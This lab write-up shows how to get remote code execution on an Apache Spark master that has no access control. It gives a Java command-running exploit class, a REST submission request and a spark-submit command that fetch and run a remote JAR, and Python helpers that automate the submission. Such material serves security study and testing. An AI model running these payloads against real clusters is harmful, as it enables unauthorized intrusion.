


Apache Spark Unauthorized Access Vulnerability

Apache Spark is a cluster computing system. It allows users to submit applications to the management node (master), which distributes them across the cluster for execution. If the master does not enable ACLs (access control), anyone who can reach it can submit an application and execute arbitrary code in the cluster.

Vulnerability Environment

Execute the following command to start an Apache Spark cluster in standalone mode; the cluster contains one master and one slave:


docker-compose up -d

After the environment is started, visit http://your-ip:8080 to see the master's management page, and visit http://your-ip:8081 to see the slave's management page.

Exploitation

The essence of this vulnerability is that an unauthorized user can submit an application to the management node, and that application can contain malicious code.

There are two ways to submit:

Leverage the REST API

Leverage the submission gateway (integrated into port 7077)

The application can be written in Java or Python. The simplest exploit class looks like this:


import java.io.BufferedReader;
import java.io.InputStreamReader;

public class Exploit {

    public static void main(String[] args) throws Exception {
        String[] cmds = args[0].split(",");
        for (String cmd : cmds) {
            System.out.println(cmd);
            System.out.println(executeCommand(cmd.trim()));
            System.out.println("==============================================");
        }
    }

    // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
    private static String executeCommand(String command) {
        StringBuilder output = new StringBuilder();
        try {
            Process p = Runtime.getRuntime().exec(command);
            p.waitFor();
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                output.append(line).append("\n");
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return output.toString();
    }
}

Compile it into a JAR and host it on an HTTP or FTP server:


https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar

In standalone mode, the master starts an HTTP server on port 6066, and we submit the application as a REST request to this port:


POST /v1/submissions/create HTTP/1.1

Host: your-ip:6066

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Content-Type: application/json

Connection: close

Content-Length: 680

{
    "action": "CreateSubmissionRequest",
    "clientSparkVersion": "2.3.1",
    "appArgs": [
        "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
    ],
    "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "environmentVariables": {
        "SPARK_ENV_LOADED": "1"
    },
    "mainClass": "Exploit",
    "sparkProperties": {
        "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
        "spark.driver.supervise": "false",
        "spark.app.name": "Exploit",
        "spark.eventLog.enabled": "true",
        "spark.submit.deployMode": "cluster",
        "spark.master": "spark://your-ip:6066"
    }
}

Here, spark.jars points to the compiled application, mainClass is the class to run, and appArgs holds the arguments passed to the application.


The response contains a submissionId; you can then visit http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout to view the execution result.


Note that the application is submitted to the master, but the result is viewed on the slave where the application actually ran (default port 8081). In real-world environments there may be multiple slaves.
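To script this flow, the CreateSubmissionRequest body shown above can be assembled programmatically. The following Python sketch is illustrative, not part of Spark: the helper names build_submission_payload and driver_log_url are my own, and the host, JAR URL, and Spark version simply mirror the example request.

```python
import json


def build_submission_payload(master, jar_url, main_class, app_args):
    # Mirrors the CreateSubmissionRequest JSON sent to the REST port (6066).
    return {
        "action": "CreateSubmissionRequest",
        "clientSparkVersion": "2.3.1",
        "appArgs": app_args,
        "appResource": jar_url,
        "environmentVariables": {"SPARK_ENV_LOADED": "1"},
        "mainClass": main_class,
        "sparkProperties": {
            "spark.jars": jar_url,
            "spark.driver.supervise": "false",
            "spark.app.name": main_class,
            "spark.eventLog.enabled": "true",
            "spark.submit.deployMode": "cluster",
            "spark.master": master,
        },
    }


def driver_log_url(slave_host, submission_id, log_type="stdout"):
    # Log page on the slave (default port 8081) that executed the driver.
    return (
        f"http://{slave_host}:8081/logPage/"
        f"?driverId={submission_id}&logType={log_type}"
    )


jar = "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar"
payload = build_submission_payload("spark://your-ip:6066", jar, "Exploit", ["id"])
print(json.dumps(payload, indent=2))
print(driver_log_url("your-ip", "driver-20200323-0001"))
```

POSTing the payload to http://your-ip:6066/v1/submissions/create and plugging the returned submissionId into driver_log_url reproduces the manual steps above.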

Submitting an Application via the Submission Gateway

If port 6066 is not accessible or is protected by access control, we can use the master's main port, 7077, to submit the application.

The method is to use the bin/spark-submit script that ships with Apache Spark:


bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar id

If the master URL you specify points to a REST server, this script first tries to submit the application via the REST API; if it finds that the target is not a REST server, it falls back to submitting via the submission gateway.

Viewing the results works the same way as before.
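As a side note, Spark's standalone REST server also exposes a status endpoint on the same port 6066, GET /v1/submissions/status/{submissionId}, which can confirm whether a submitted driver actually ran. A minimal sketch, assuming the same placeholder host as above (fetch_status only works against a live master, so the example prints the URL rather than calling it):

```python
import json
import urllib.request


def status_url(master_host, submission_id):
    # Status endpoint of the standalone REST server (same port as create).
    return f"http://{master_host}:6066/v1/submissions/status/{submission_id}"


def fetch_status(master_host, submission_id):
    # Performs the GET against a live master; not executed in this sketch.
    with urllib.request.urlopen(status_url(master_host, submission_id)) as resp:
        return json.load(resp)


print(status_url("your-ip", "driver-20200323-0001"))
```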
